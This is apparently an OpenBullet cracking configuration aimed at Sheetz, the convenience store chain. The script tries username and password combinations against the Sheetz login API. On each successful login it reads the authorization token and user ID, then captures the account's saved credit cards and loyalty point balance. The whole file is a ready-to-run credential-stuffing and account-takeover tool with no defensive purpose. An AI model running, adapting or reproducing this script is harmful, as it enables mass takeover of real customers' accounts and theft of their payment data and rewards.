[SETTINGS]
{
  "Name": "Sheetz",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2020-05-08T23:23:09.5918878-04:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "i wanna die#0001",
  "Version": "1.2.1",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://orderz.sheetz.com/sas/auth/login" 
  CONTENT "username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Incorrect credentials were entered" 
  KEYCHAIN Success OR 
    KEY "authorizationToken" 

PARSE "<SOURCE>" LR "authorizationToken\":\"" "\"" -> VAR "AUTH" 

PARSE "<SOURCE>" LR "userId\":" "," -> VAR "ID" 

REQUEST GET "https://pay.sheetz.com/payment/api/v2/paymentMethods/creditCards" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: <AUTH>" 

PARSE "<SOURCE>" LR "[" "]" CreateEmpty=FALSE -> CAP "CC" 

REQUEST GET "https://orderz.sheetz.com/sas/v1/mobile/users/<ID>/loyaltyTiers" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: <AUTH>" 

PARSE "<SOURCE>" LR "availablePoints\":" "," CreateEmpty=FALSE -> CAP "POINTS" 

